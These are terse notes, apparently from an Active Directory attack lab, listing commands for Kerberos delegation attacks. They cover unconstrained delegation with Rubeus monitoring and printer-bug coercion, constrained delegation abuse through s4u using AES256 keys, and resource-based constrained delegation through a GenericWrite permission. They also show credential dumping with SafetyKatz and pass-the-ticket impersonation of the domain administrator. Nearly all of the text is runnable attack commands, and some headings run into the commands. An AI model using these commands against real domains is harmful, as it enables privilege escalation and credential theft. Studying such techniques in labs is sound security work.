Kerberos delegation based attacks
unconstrained delegation
PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True}
# get to the computer and start rubeus
PS> echo F | xcopy C:\AD\Tools\Rubeus.exe \\us-web\C$\Users\Public\Rubeus.exe /Y
PS> C:\Users\Public\Rubeus.exe monitor /targetuser:US-DC$ /interval:5 /nowrap
# get traffic towards that machine
PS> C:\AD\Tools\MS-RPRN.exe \\us-dc.us.techcorp.local \\us-web.us.techcorp.localconstrained delegation
Find out what which computers allow for delegation:
PS> Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
# msDS-AllowedToDelegateTo: service to abuse (msdsspn)
# distinguished name: userUse s4u to become admin
PS> C:\AD\Tools\Rubeus.exe s4u /user:appsvc /aes256:b4cb0430da8176ec6eae2002dfa86a8c6742e5a88448f1c2d6afc3781e114335 /impersonateuser:administrator /msdsspn:CIFS/us-mssql.us.techcorp.local /altservice:HTTP /domain:us.techcorp.local /pttRBCD
This is possible with Generic Write:
# find interesting ACLs, e.g. GenericWrite
PS> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match 'mgmtadmin'}
# add RBCD for the user we have GenericWrite upon
PS> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
PS> Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
PS> Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
PS> $comps = 'student21$'
PS> Set-ADComputer -Identity us-helpdesk -PrincipalsAllowedToDelegateToAccount $comps -Verbose
# get key for student21$ (aes256_hmac)
PS> C:\AD\Tools\SafetyKatz.exe -Command "sekurlsa::keys" "exit"
# create a new session
PS> C:\AD\Tools\Rubeus.exe s4u /user:studentx21 /aes256:3845eac1016c33077d3619b3f931168db1343a223f3d7f9fc4424c77f8383578 /msdsspn:http/us-helpdesk /impersonateuser:administrator /ptt
PS> C:\AD\Tools\Rubeus.exe s4u /user:studentx21 /aes256:3845eac1016c33077d3619b3f931168db1343a223f3d7f9fc4424c77f8383578 /msdsspn:cifs/us-helpdesk /impersonateuser:administrator /ptt